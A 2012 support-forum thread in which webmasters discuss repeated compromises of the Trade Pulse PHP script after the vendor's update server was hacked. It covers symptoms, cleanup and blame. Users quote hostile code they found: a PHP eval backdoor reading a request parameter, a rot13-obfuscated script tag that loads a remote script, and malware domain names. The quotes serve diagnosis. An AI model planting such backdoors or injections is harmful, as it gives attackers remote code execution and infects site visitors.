Script Pulse
Trade Pulse => Trade Pulse Support => Topic started by: oil on January 21, 2012, 04:32:30 PM
-
one of my traders reported that all my TP sites are hacked again i am on built 43 as of now
so a few things need to be said here:
the Tools - Scanner reports that 10 files have wrong checksums
however - if they have wrong checksum - so why in the fucking hell it doesnt show that on main page top, that there is something wrong
and the scanner is not that smart overall or buggy
it says
in the single cols , some are wrong, the summary says
No wrong files found.
Conclusion
10 files are out of date. Please update your script to the latest version.
-
the 10 files where checksums are wrong are>
tp/admin.php
tp/auth.php
tp/c.php
tp/class.Settings.php
tp/class.Stats.php
tp/out.php
tp/settings.php
tp/toplist.php
tp/top_thumb.php
tp/trade.php
-
.... however those where not the hacked files, we figured out so once again
the scanner doesnt find SHIT and is useless therefore
the hacked files where again, same as last time
filter.php
remote_updater.php
tools.php
tpupdater.php
updater.php
vtop.php
so is there a way to secure those files, seriously was the biggest supporter of TP but its the same hack over and over again,
and i think it should be possible to secure those files in anyway
look... i know you guys say it cant be TP anymore there is some other security hole on this particular box where people get in, and it very well might be possible however killdozer was on my server very often to check for things, put some loggers there and such, and still its the same thing over and over again
-
Hi, I just woke up since I saw this on my cell(trying to get sleep after 10 days of 18+hrs/day) of work...tried to reach U over icq no response. Anyway please PM me contact info where I can reach U so we can solve it tomorrow. REally out of top of my head maybe U still running wrong version of tp(hacked)....try downloading scriptpulse.com/tp/tpupdater.zip, unzip, upload to tp dir and then run updater.
Over and out let's solve it tmrow. If U had any traffic loss we will compensate of course with feed.
Cheers
-
heya, i am totally sure i have the latest version cause this /tp/tpupdater.zip i did when built 43 was released, or it was even 42 well when you sent out the mailer i did that on all sites
the hack, the changed files where dated on the 21 so yesterday,
i got the hack removed by now with the old funny method of copying the files
filter.php
remote_updater.php
tools.php
tpupdater.php
updater.php
vtop.php
from a clean install on another box to all /tp/ folders on the infected box,
i ll prepare apache logs for killdozer, since the hack was quite fresh i hope he can find something how the fuckers hacked into it, will shot the download url to killdozer as soon i have the logs
traffic loss was luckily minor since a trade partner had the luck of seeing it pretty soon, unfort. the hack doesnt trigger for me, however the sites where blocked from chrome browser, and since they seem to be clean now, i hope that they wont get FF blocked or even short term removed from google.
so loss over full network was less then 40K as of now, the most bugging part for me is just the fact they are still finding ways to get into it,
as for contact, yep i am lately not much on icq, best and most secure to get ahold of me is email, you know the adress :D
-
Hi,
same issue over here. I updated all my 50 TGPs manualy. Thank you btw. for the hint with the files.
If you got any information for me I would be glad if you would share it mit me.
Maybe I will rsync a folder with a clean version of TP to all /tp/ folders of my TGPs.
All the best
-
Hi,
same issue over here. I updated all my 50 TGPs manualy. Thank you btw. for the hint with the files.
If you got any information for me I would be glad if you would share it mit me.
Maybe I will rsync a folder with a clean version of TP to all /tp/ folders of my TGPs.
All the best
thats what i do atm, however its not a solution to close a security hole its just a quick fix
-
less then 24h later hacked again, same files again, please guys tell me i can set permissions of them to anything else then 777 and they still work, i have indeed better things to do then replacing those files on 50 tp installs once per day
-
Calling kildoozer will get back to you asap.
-
Calling kildoozer will get back to you asap.
oki sent him a few emails with the apache logs to download after each hack, but didnt hear back from him
-
I've got similar problems even after kildoozer ran the scan and removed a bunch of php shells. Now my host is saying
"It is injected through filter.
tp is not sanitizing input, and, since it is ioncube encoded, difficult to say where the injection occurs.
I found a number of iframes and javascripts in pt_request - which appears to be a partner request form. Since they aren't validating info there, I would suspect they aren't validating it anywhere."
-
I'm still finding files scattered throughout tp that shouldn't be there, scanner doesn't notice them at all....
-
Hi to everyone.
1. About 'buggy' scanner. This fuckin kirgizian hacker changed the scanner itself, so it can't find some wrong files, like filter.php or tpupdater.php. Moreover, tpupdater can't update these important files because it's 'fixed' also.
Current file size of tpupdater.php is 14722 bytes (you can check it with the scanner), if this size match with your current -you're able to update the script to latest build. If size doesn't match - you have to use tpupdater.php from the our server and your 'problem' has old 'roots'.
For those who get hacked over and over again - I need your server logs to understand which hole is using, because it seems I left some shit uncleaned. Ifter analizing these logs I'll be know how to protect the servers once and forever.
I found a number of iframes and javascripts in pt_request - which appears to be a partner request form. Since they aren't validating info there, I would suspect they aren't validating it anywhere."
all info from the requests are htmlspecialchars'ed at least, so it can't be run in any case.
Anyway please provide me as much info as you get, both logs and pt_requets. Your help is very appreciated.
Next. I gonna code (done at 95%) external scanner (not for tp's files only). You'll run this scanner and it will scan all directories on the server recursively, seraching for shells and other shit using our signatures DB.
1. Now I'm waiting for logs for analize, only after this step I can clean the shit permanently.
2. If you can't update your copies (tpupdater filesize mismatch) - please use our х http://www.scriptpulse.com/tpupdater.zip (http://www.scriptpulse.com/tpupdater.zip) for the quick script repair
My emal is kildoozer@scriptpulse.com
-
sent you the logs from 48h hack and the one from the 24h hack ago, i ll hope you ll find something
if your ip is still the same as last time, you last FTP access still should be working
-
It might be helpful in the future to provide SHA-2 hashes for various files (File sizes aren't necessarily safe) with each version so that people could manually check them if they have doubts about the integrity of their TP install.
You might also make a special utility which people must manually download which automatically checks the files upon demand. This way the cracker cannot just subvert the automatic check. The special utility could then work for people with no ssh access too. They would just drop it in place via FTP and then execute it. This would be a backup for the automatic scanner to help catch the tricky hackers.
edit: for bonus security make the manually downloaded automatic sha-2 hash check utility generate a random filename each time it is downloaded.
-
Hi,
we are still getting hacked, too. I also found suspicious files in my ST folder now :(
Some code I can read.. the other files are encoded in ioncube
<?php //0047b
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');if(function_exists('dl')){@dl($__ln);}if(function_exists('_il_exec')){return _il_exec();}$__ln='/ioncube/'.$__ln;$__oid=$__id=realpath(ini_get('extension_dir'));$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}if(function_exists('dl')){@dl($__ln);}}else{die('The file '.__FILE__." is corrupted. Ensure that you use binary mode when transferring files with FTP and disable the 'TAR smart cr/lf feature' if using WinZIP\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Your server does not support IonCube-encoded files.<br>Please run <a href=tpupdater.php?id=versions>tpupdater.php
Should I attach the files I found at this post or sent it to killdozer?
All the best!
-
Send to kildoozer please.
-
right after kildozer cleaned out the server yesterday ..... today morning server was hacked again !!!!!!!!!
-
right after kildozer cleaned out the server yesterday ..... today morning server was hacked again !!!!!!!!!
.... wonder when this will end, kildozer i sent you the apache logs to download for the hack right after you cleaned it out
-
any news on this?
-
any news on this?
server has been cleaned out, and so far so good, will prolly know more tommo, cause the last couple of days i had the hack each and every new day
-
To everyone who want to check the server for backdoors - please download http://www.scriptpulse.com/scan.zip, unzip and upload to any of your site, provide me a link to kildoozer@scriptpulse.com
I'll analyze results and tell you what to do next.
-
How do you know if your hacked, I droped that scan on both my servers and it found nothing but how would I know if Ive been hacked
-
If it found nothing U are safe :).
U would notice some ads on site, strange TP behaviour, updates wouldn't work, scanner would show wrong files etc. Hack affected less then 1% of our users and we are doing all we can to stop it on their servers.
-
Running the scanner shows about a third of my sites with the following errors:
tp_in.php 21348 January 22, 18:25:47 Wrong checksum
tp/vtop.php 37235 January 18, 13:49:02 Wrong checksum
-
2 Shoplifter: what updater said? I mean all files were updated successfully?
-
And the ads are back again. Ran scanner, No wrong files found.
Ran scan.php Scan was completed 15370 d 0:14:29 ago. No suspicious code found
And yet it's there, google's nice enough to give my sites a virus warning now so no wonder my sales suck.
Once I delete tpupdater.php and rerun the massupdate it downgrades to Version 1.0.6 build 35, reupgrading to current version works then but scanner now finds twilight_loader.php file I'll send that to kildoozer
-
Shawn check PM please. thnx.
-
2 Shoplifter: what updater said? I mean all files were updated successfully?
After an update the scan is clear, but I have others saying they are getting safe browsing warnings on my sites. I can't see the warning with Chrome so I am not sure what is up.
Traffic is way down tho so something is wrong that I cannot see.
-
I've noticed the newer injected ads seem to only appear for me once but other people get them repeatedly and the search engines and browsers throw warnings, guess the hackers getting smarter.
-
2 Shoplifter: what updater said? I mean all files were updated successfully?
After an update the scan is clear, but I have others saying they are getting safe browsing warnings on my sites. I can't see the warning with Chrome so I am not sure what is up.
Traffic is way down tho so something is wrong that I cannot see.
This is related to google U should contact them to remove it!
-
I sent your info to kildoozer it should be fixed.... please be patient it takes time + we have 2 more clients with same issue....hopefully U are last 3 :)
-
That would be a no on that. I have 2 boxes with 50 sites infected. All with different log-ins
I was hoping for a new version that would address this. Its great your offering to clean out a server, but without a patched revision to
address the hole, cleaning out the box would only be a band-aid.
I can never get the ads to show myself, which almost gives me the impression the possiblity exists that he put my ip on a whitelist. Although the ads show when i visit my sites from my smartphone.
I also have my traders saying that google crome's advast gives malware warnings.
Has the hole been found? Is there a solution other than "cleaning it out?"
-
Hole was never there, hole was our server at xxxhostit got hacked. COuple clients affected by that still have issues because hacker inserted on their system shell exec scripts. So with cleaning entire system and changing usernames/passes U are safe. But U need to clean system, change user passes + update tp to latest files(non infected) simultaneously.
Tricky part in entire story is find ALL shell exec scripts.
-
If the hacker can had root access then the safest thing to do (although it is time consuming and a pain) is to [on a dedicated server anyway] wipe out the entire drive, reinstall the OS and then restore from the latest known good backup. It's always dangerous just to try to find all the backdoors and rootkits the crackers might have left because all it takes is one for them to get back in. Then you'll be continually having to do this. So sometimes it's easiest just to clean it the right and "old school" way in the first place.
If you can't do this for whatever reason I guess you take your chances and hope for the best. I hope everything gets fixed.
-
He did not have root access, via ftp...but he had chance to do it via shell scripts....either way we are close to eliminating this 500%!!! Whoever has problem info@scriptpulse.com email me with ftp info!!!
-
I just want to thank Kildoozer for cleaning out my accounts and fixing me up. Great guy to step up to the plate like he did, thank you
-
Four of my sites were hacked again, the scanner shows the wrong date and checksum for tp_in.php. Doing an upgrade seems to clear the tp_in.php scan error.
One of the sites is now blocked by Google safe browsing with the following message:
What happened when Google visited this site?
Of the 16 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-02-23, and the last time suspicious content was found on this site was on 2012-02-23.
Malicious software includes 5 scripting exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software is hosted on 3 domain(s), including simplenssentinel.de.gg/, smartjcchecker.de.gg/, simple-dtnetwork.it.cx/.
4 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including ringostart.osa.pl/, safesoftcy.com/, simplenssentinel.de.gg/.
This site was hosted on 1 network(s) including AS30266 (A1COLO).
Arrrrgggghhhh....
-
Kildoozer sent U email/icq message anyway we ened tp/ftp access - email to info@scriptpulse.com AND kildoozer@scriptpulse.com
Four of my sites were hacked again, the scanner shows the wrong date and checksum for tp_in.php. Doing an upgrade seems to clear the tp_in.php scan error.
One of the sites is now blocked by Google safe browsing with the following message:
What happened when Google visited this site?
Of the 16 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-02-23, and the last time suspicious content was found on this site was on 2012-02-23.
Malicious software includes 5 scripting exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software is hosted on 3 domain(s), including simplenssentinel.de.gg/, smartjcchecker.de.gg/, simple-dtnetwork.it.cx/.
4 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including ringostart.osa.pl/, safesoftcy.com/, simplenssentinel.de.gg/.
This site was hosted on 1 network(s) including AS30266 (A1COLO).
Arrrrgggghhhh....
-
Yup coming back on my sites as well, i had all my tp passess changed too, didnt seem to do a thing
Not good, not good at all.
-
Yup coming back on my sites as well, i had all my tp passess changed too, didnt seem to do a thing
Not good, not good at all.
Hey, kildoozer will contact U soon. I sent him msg already to solve it asap!
-
Kildoozer sent U email/icq message anyway we ened tp/ftp access - email to info@scriptpulse.com AND kildoozer@scriptpulse.com
Message sent to Killdozer. Thanks for the help!
-
Still nothing.......
I would like some tips or some ideas how to rid of this thing and keep it off this time, really looking like i have to get a new server and reinstall from scratch everything now. But will it just come back again? Killdoozer cleaned it up but its back again.
The scanner shows nothing is wrong now but still get the popups etc (that are not my ads)
is this been found to hop out of the tp folder, or out of the public_html folder? is it jumping to the apache kernal or server files? in st? anything like this?
-
I found malicious code outside of tp scattered in various domains that didn't even have tp. So I'd check out everything if you can...
-
Thanks for the heads up :)
-
Guys I am waiting for kildoozer, just woke up after insane day yesterday(shitload of work).
When he arrives we will try to solve your issues or write here what to do.
-
Ok kildoozer is already working on tool to lock tp files so they are not writable (more details soon dont worry all will work fine :) ).
It will be done today, then I will write instructions in forum on how to fix/lock your tp's!
Please stay tuned, finally we nailed this SOB.
-
Looking forward to something to help, im still infected with 47 sites thats making someone else money
-
Please I know I ask MUCH but I ask you bit more of patience, kildoozer today inspected your servers and clean some files, tomorow he continues...he was again without damn electricity entire day! He also coded for a tiny bit new secure locking system hopefully tomorrow all is solved. When we clean your server we will deposit some $$$ to broker of your choice so U can buy some feed to compensate!!!
Once again, my apologies!
-
For all who still have problems with hack here is solution:
http://forum.scriptpulse.com/index.php/topic,1484.0.html
-
8888<script888888 language="JavaScript"
type="text/javascript">function rot13(input){return
input.replace(/[a-zA-Z]/g,function(ch){return
String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg
fep=\"uggc://mvk.vz/!tybony/.cuc\"></fpevcg>"));888888</script88888
is this code yours or his? (i added 88888'8 in the code here to post)
-
I think its his, please follow instructions here: http://forum.scriptpulse.com/index.php/topic,1484.0.html
-
Just going through the server cleaning up this stuff. I also have a vulnerablilty to show you
-
great, email me details to info@scriptpulse.com !
-
it happend again :(
after cleaning it, locking it.
all files are back at 777 and tpupdater.php
was changed.
/stats/cache/auth.php
was found with the scan.php
if (isset($_REQUEST["auth"])) eval(stripslashes($_REQUEST["auth"]));
this was added to variables.php
-
was finding these in the toplists tpl and html files, just a heads up to everyone to help clean up, last line of code
-
If U cleaned and locked, speak with your host why files got replaced, its not in our domain :). Basically its wrong apache config or they use suphp so process (shell scripts) run under user.
Please consult your webhost and point them to changelog. If they have any questions info@scriptpulse.com
-
If U cleaned and locked, speak with your host why files got replaced, its not in our domain . Basically its wrong apache config or they use suphp so process (shell scripts) run under user.
The problem is the cleaning. No one has really posted a good cleaning process. Its hopping out of the TP folder. You can delete the whole tp folder and install from scratch, it comes back. The backdoors or scripts are still outside of the tp folder. Yes there are hacked tp files, but thats not the backdoor.
Lets not forget the original problem was the hacked update. This "Hack" that "keeps coming back" means it wasnt cleaned off the server properly. Yes we can "lock it". But it doesnt mean the "hack" is off your server. I dont believe for a second that this hack has anything to do with our original server security/configuration.
Once this tp updater hack gets on your server, your basically fucked. because the timestamps of the hacked files match on all domains on a server. Even on fresh tp installs. and by fresh, i mean deleting the tp folder completly AND toplist folders, its back a day later.
I have something for anyone to try... move your domain to a virgin server, install Smart thumbs, trade pulse from scratch, import your thumbs from another smart thumbs and a exported tradeslist, check your toplist codes before you import them, see your problem dissappear.
Has anyone tried this besides me and see it come back? I would like to hear this....
I know that your files where hacked and im not blaming you for that, but sorry, I have a tough time with your statment, this gives me the impression that your passing the cause of this problem to our servers config or hosting admin.
Im not trashing you, but I dont see any problem with TP being hacked when your server is actually clean. The problem is getting your server clean. A lock.php isnt going to take out the backdoor on your server.
-
I agree 500% with you that lock.php is not FINAL solution, but lock.php is temp solution till your hoster cleans out shell scripts!
Servers are not our domain(we are doing SCRIPTS) so your hoster should clean it up and if they have any questions they are free to post here or over icq 169397168 or email info@scriptpulse.com.
This hack didn't come because of your server security, it came because of OUR server security when hacker got it and changed update files for cpl hrs :(.
I said your server security is bad in case shell exec scripts can change locked files.